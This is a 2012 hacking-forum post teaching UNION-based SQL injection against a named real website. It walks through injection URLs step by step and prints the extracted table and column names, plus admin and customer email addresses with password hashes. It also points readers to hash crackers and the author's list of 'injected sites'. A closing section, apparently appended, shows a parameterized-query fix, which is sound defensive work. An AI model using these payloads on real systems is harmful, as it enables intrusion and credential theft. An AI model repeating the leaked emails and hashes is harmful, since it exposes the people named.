SQL Simple Injection Tutorial By Beastar! 12-28-2012, 09:24 PM
#1
Hello DZ members
Today I will make a tutorial for SQLi; it's simple.
Later I will post SQLi bypass Forbidden (WAF).
Well, let's start.
We need dorks to get vulnerable websites.
Search at the forum or Google.
Let's go!
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=14
1- Let's make sure whether the site is vuln or not
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=14'
It shows
Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Some errors could be found
· mysql_num_rows()
· mysql_fetch_array()
· Error Occurred While Processing Request
· Server Error in '/' Application
· Microsoft OLE DB Provider for ODBC Drivers error
· error in your SQL syntax
· Invalid Querystring
· OLE DB Provider for ODBC
· VBScript Runtime
· ADODB.Field
· BOF or EOF
· ADODB.Command
· JET Database
· mysql_fetch_row()
· Syntax error
· include()
· mysql_fetch_assoc()
· mysql_fetch_object()
· mysql_numrows()
· GetArray()
· FetchRow()
· Input string was not in a correct format
· Microsoft VBScript;
QUICK SQL COMMANDS OVERVIEW:
UNION ALL - Combine multiple columns
SELECT - Selecting the information you want
ORDER BY - Orders columns by alphabetical or numerical order
LIMIT - The number of the selected field to be displayed
FROM - Selecting where you want to pull the information you want from.
CONCAT - Short for concatenate, which means to combine two strings into one.
GROUP_CONCAT - Grouping all values from a concatenated string
2- We use ORDER BY TO DETERMINE THE NUMBER OF COLUMNS:
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 15-- ERRORS
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 10-- ERRORS
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 9-- NO ERRORS
3-Time to use UNION SELECT
http://collards.co.za/customer_testimoni...ial_id=-14 UNION SELECT 1,2,3,4,5,6,7,8,9--
Make sure to include the - in the beginning and the -- at the end
We will find a number in this result
In this situation we found this number: 3
4- Now I will show you this method, but it works for database version 5+, no less
Now let's find out this website's database version
Follow the commands carefully please
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,CONCAT(database(),user(),version()),4,5,6,7,8,9--
Result:
collards_osc1collards_osc1@localhost5.0.95-community
Code:
Database name : collards_osc1
Localhost : collards_osc1@localhost
Database version : 5.0.95-community
5- Getting Admin info or CCs or Email/Pass Time!
This command to get tables :
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Result:
Code:
additional_images,address_book,address_format,admin,admin_files,admin_groups,admin_projects,admin_tasks,admin_tasks_priorities,admin_tasks_statuses,anti_spambot_contact,article_faqs,article_faqs_description,article_forms,article_reviews,article_reviews_description,articles,articles_description,articles_to_topics,articles_xsell,authors,authors_info,banners,banners_history,banners_to_categories,cache,categories,categories_description,configuration,configuration_group,contact_emails_sent,counter,counter_history,countries,currencies,customer_service,customer_testimonials,customers,customers_basket,customers_basket_attributes,customers_favourite,customers_info,customers_temp,customers_to_extra_fields,customers_wishlist,customers_wishlist_attributes,define_content,define_content_description,downloads,events_calendar,extra_fields,extra_fields_info,faq,featured,footlinks,geo_zones,information,languages,maillist,manufacturers,manufacturers_info,more_article_images,newsdesk,newsdesk_categories,newsdesk_categories_descr
Well, I think we will need the admin table haha
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name="admin"--
OMG result:
Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"admin\"--' at line 1
select * FROM customer_testimonials WHERE testimonials_id = -14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=\"admin\"--
This site is injectable sry guyz cya next time
Kidddddddding
Let's rock more
So we make hex of the table name
Well brothers, to get hex you need to download Hackbar 1.6 Add_ons (Mozilla Firefox)
it's the best for hackers!
Well, I don't know if there's a hex maker on the net, you can check it
Now delete "admin"
hex it
go to the hackbar
Encoding > Hex Encoding > String to 00ff00ff00
You can do it with char or other strings but I will use this in this tutorial
Result:
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=61646d696e--
Wait not done yet!!
add 0x to the hex just like that
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e--
Fuck yeah we got it
Column names in the admin table are (result):
Code:
admin_id,admin_groups_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_created,admin_modified,admin_logdate,admin_lognum,admin_cat_access,admin_right_access
OK, now let's get the data
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,admin_password),4,5,6,7,8,9 from admin--
Don't use hexed admin here, use it normal
OK, some people use this command 0x3a or 0x0a to make space between the data!!
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,0x0a,admin_password),4,5,6,7,8,9 from admin--
OR
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,0x3a,admin_password),4,5,6,7,8,9 from admin--
Result:
Code:
vivienne@cosmicwalk.com 89793b3210992786b3dac3e2167a1926:4b,branwen@web-inn.co.za 484856a059ba526bb8779e9f1e7d50b7:b0,alan@web-inn.co.za 883819a4096b44b0e46faf27c8d85508:51,vivienne@web-inn.co.za 9399f4ca292e822a74357fe6841cc6e1:53,philip@genfin.co.za 7acd4b507d3fcda27b1a19f070cb8050:e3
Bompp we got admin login
Looks like we got hashed passwords... damn
Hashes could be MD5, SHA1 and a lot more
Check this site, it's the best!!!
http://www.crypo.com
In this tutorial I'll give you another chance to understand SQL more
Let me get Customers info for you
Let's choose the Customers table now
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.tables where table_name="customers"--
Same shit!!!!!!
Let's make hex
Customers > HEX YES
"Customers" > NO, delete the " " remember!
And of course we add 0x to the hex as I told you before
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x637573746f6d657273--
Result:
Code:
customers_id,purchased_without_account,customers_gender,customers_firstname,customers_lastname,customers_dob,customers_email_address,customers_default_address_id,customers_telephone,customers_fax,customers_password,customers_newsletter,member_level
Let's choose
customers_email_address
customers_password
Command :
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(customers_email_address,0x0a,customers_password),4,5,6,7,8,9 from customers--
Result:
Code:
vivienne@web-inn.co.za d55c27b7aa6ac812426c8545fefeeaf5:2e,mail@branwen.co.za 5955085acd2db1e40b9cbe27274ea733:3f
Guyz, about those crackers, don't get confused
http://devil-zone.net/vb/showthread.php?...-Crackers/
I hope you all learned, and if there's any problem reply here, I will try to help
By the way, here are some of my injected sites to DZ
http://devil-zone.net/vb/showthread.php?...-CC)-By-me
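
Every step in the post works because `testimonial_id` reaches the query unquoted, so the quote escaping visible in the `\"admin\"` error never comes into play. As an added example (not code from the original post or from the affected site), the escaped-concatenation lookup is shown beside a validated, bound one; the SQLite stand-in, function names and sample rows are constructed assumptions, and the post's target runs MySQL.

```python
import sqlite3

# Constructed payload in the shape the post uses: negative id, UNION SELECT, trailing "--".
PAYLOAD = "-14 UNION SELECT admin_email_address, admin_password FROM admin--"

def make_db():
    """In-memory stand-in; table and column names follow the post, rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE customer_testimonials (testimonials_id INTEGER, body TEXT);
        CREATE TABLE admin (admin_email_address TEXT, admin_password TEXT);
        INSERT INTO customer_testimonials VALUES (14, 'Great service');
        INSERT INTO admin VALUES ('admin@example.test', 'constructed-hash');
    """)
    return db

def escape_quotes(value):
    # addslashes-style filtering: only quotes and backslashes are touched.
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def lookup_escaped(db, testimonial_id):
    # VULNERABLE (hypothetical handler): the value is spliced into a numeric
    # context, so the payload needs no quote and the escaping is a no-op.
    sql = ("SELECT testimonials_id, body FROM customer_testimonials "
           "WHERE testimonials_id = " + escape_quotes(testimonial_id))
    return db.execute(sql).fetchall()

def lookup_bound(db, testimonial_id):
    # HARDENED: reject anything that is not a plain integer, then bind it so
    # the driver never parses request data as SQL.
    if not (testimonial_id.isascii() and testimonial_id.isdigit()):
        raise ValueError("testimonial_id must be a non-negative integer")
    return db.execute(
        "SELECT testimonials_id, body FROM customer_testimonials "
        "WHERE testimonials_id = ?", (int(testimonial_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_escaped(db, "14"))
    print(lookup_escaped(db, PAYLOAD))   # admin row leaks through the UNION
    try:
        lookup_bound(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The same binding principle applies to MySQL through prepared statements in PDO or mysqli.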